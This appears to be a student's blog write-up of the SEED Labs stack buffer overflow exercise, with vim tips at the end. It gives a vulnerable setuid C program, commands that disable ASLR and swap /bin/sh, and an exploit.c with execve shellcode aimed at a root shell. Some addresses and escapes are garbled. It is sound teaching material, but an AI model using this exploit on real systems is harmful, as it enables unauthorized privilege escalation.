zoukankan      html  css  js  c++  java
  • 缓冲区溢出漏洞实验

    实验原理

       缓冲区溢出是指程序向一个已分配内存的固定长度缓冲区写数据,使得数据超出了缓冲区的边界。用心不良的用户就可以利用这个漏洞改变程序执行的方向,甚至可以执行一段恶意的代码。本质上说,漏洞的根源是计算机的内存中,数据和指令(例如函数的返回地址)是一起存储的,这样数据部分的溢出可能会影响到程序指令部分的执行,例如函数的返回地址指令就有可能会被改写。
       本次实验提供一个具有缓冲区漏洞的程序,我们的任务是利用这个漏洞获取root权限。
    

    实验内容

    环境配置

    第一步

    在UbuntuSEED系统中,目前都使用内存地址随机化的机制来初始化堆栈,这将会使得猜测具体的内存地址变得十分困难,所以在本试验中,用下列命令关闭内存随机化机制:

    $ su root
    Password: (enter root password)
    #sysctl -w kernel.randomize_va_space=0
    

    第二步

    此外,为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个Set-UID程序调用一个shell,也不能在这个shell中保持root权限,这个防护措施在/bin/bash中实现。

    linux系统中,/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个shell程序(zsh)代替/bin/bash。下面的指令描述了如何设置zsh程序:

    sudo su
    cd /bin
    rm sh
    ln -s /bin/zsh /bin/sh
    exit
    

    shellcode

    一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是shellcode。在开始攻击之前,我们需要一段shellcode,shellcode是一段启动shell命令的代码。这段代码被放置在内存中,我们让具有缓冲区漏洞的程序跳到这段代码上去执行它。

    漏洞程序

    /* stack.c */
    /* This program has a buffer overflow vulnerability. */
    /* Our task is to exploit this vulnerability */
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    int bof(char *str)
    {
    char buffer[12];
    
    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);
    
    return 1;
    }
    
    int main(int argc, char **argv)
    {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    printf("Returned Properly
    ");
    return 1;
    }
    

    编译漏洞程序命令:

    $ su root
    password (enter root password)
    # gcc -o stack -fno-stack-protector stack.c
    # chmod 4755 stack
    # exit
    

    攻击程序

    我们的目的是攻击刚才的漏洞程序,并通过攻击获得root权限。

    把以下代码保存为“exploit.c”文件,保存到 /tmp 目录下。代码如下:

    /* exploit.c */
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    char shellcode[]=
    
    "x31xc0"    //xorl %eax,%eax
    "x50"        //pushl %eax
    "x68""//sh"  //pushl $0x68732f2f
    "x68""/bin"  //pushl $0x6e69622f
    "x89xe3"    //movl %esp,%ebx
    "x50"        //pushl %eax
    "x53"        //pushl %ebx
    "x89xe1"    //movl %esp,%ecx
    "x99"        //cdq
    "xb0x0b"    //movb $0x0b,%al
    "xcdx80"    //int $0x80
    ;
    
    void main(int argc, char **argv)
    {
    char buffer[517];
    FILE *badfile;
    
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
    
    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??");
    strcpy(buffer+100,shellcode);
    
    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    }
    

    注意上面的代码,“x??x??x??x??”处需要添上shellcode保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。

    而 strcpy(buffer+100,shellcode); 这一句又告诉我们,shellcode保存在 buffer+100 的位置。

    现在我们要得到shellcode在内存中的地址,输入命令:

    gdb stack
    
    disass main
    

    结果如图:

    接下来的操作:

    根据语句 strcpy(buffer+100,shellcode); 我们计算shellcode的地址为 0xbffff2fo(十六进制)+100(十进制)=0xbffff354(十六进制)

    现在修改exploit.c文件!将x??x??x??x??修改为 x54xf3xffxff

    然后,编译exploit.c程序:(十六进制)+100(十进制)=0xfffff354(十六进制)

    gcc -m32 -o exploit exploit.c
    

    攻击结果

    先运行攻击程序exploit,再运行漏洞程序stack,观察结果:

    困难及解决

    使用vim进行命令行编辑的时候,输入:wq无法退出,一直提示错误,无法退出,是因为着急忘了先按下 ESC退出编辑模式在进行输入。但是使用了另外的方法解决的,输入 :w newfile 把当前文件的内容保存到指定的newfile中,而原有文件保持不变。
    然后仔细学习了几个vim退出命令。

    • 在命令模式中,连按两次大写字母Z,若当前编辑的文件曾被修改过,则Vi保存该文件后退出,返回到shell;若当前编辑的文件没被修改过,则Vi直接退出, 返回到shell。
    • 在末行模式下,输入命令

      :w

      Vi保存当前编辑文件,但并不退出,而是继续等待用户输入命令。在使用w命令时,可以再给编辑文件起一个新的文件名。

    •  :w newfile

      此时Vi将把当前文件的内容保存到指定的newfile中,而原有文件保持不变。若newfile是一个已存在的文件,则Vi在显示窗口的状态行给出提示信息:

      File exists (use ! to override)

      此时,若用户真的希望用文件的当前内容替换newfile中原有内容,可使用命令

      :w! newfile

      否则可选择另外的文件名来保存当前文件。

    • 在末行模式下,输入命令

      :q

      系统退出Vi返回到shell。若在用此命令退出Vi时,编辑文件没有被保存,则Vi在显示窗口的最末行显示如下信息:

      No write since last change (use ! to overrides)

      提示用户该文件被修改后没有保存,然后Vi并不退出,继续等待用户命令。若用户就是不想保存被修改后的文件而要强行退出Vi时,可使用命令

      :q!

      Vi放弃所作修改而直接退到shell下,并不保存已经编辑的文件。

    • 在末行模式下,输入命令

     :wq

      Vi将先保存文件,然后退出Vi返回到shell。

    *  在末行模式下,输入命令

      :x

      该命令的功能同命令模式下的ZZ命令功能相同。

    • 学习还是要扎扎实实切不可粗心大意,小细节不可忽视。
  • 相关阅读:
    纯前端导出Excel表格
    vue 组件按需引用,vue-router懒加载,vue打包优化,加载动画
    解决图片循环展示间距
    微信小程序aes前后端加密解密交互
    判断字符串中是否包含表情
    银行卡号Luhn校验算法
    身份证校验(支持15位和18位身份证号)、邮箱校验正则
    数组去重
    bootstrap 中 css 与 javascript 的使用
    js 分页
  • 原文地址:https://www.cnblogs.com/zhaohui801/p/7029018.html
Copyright © 2011-2022 走看看